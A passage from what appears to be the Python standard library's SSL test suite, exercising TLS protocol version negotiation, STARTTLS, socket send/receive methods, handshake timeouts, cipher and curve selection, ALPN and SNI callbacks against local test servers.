listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
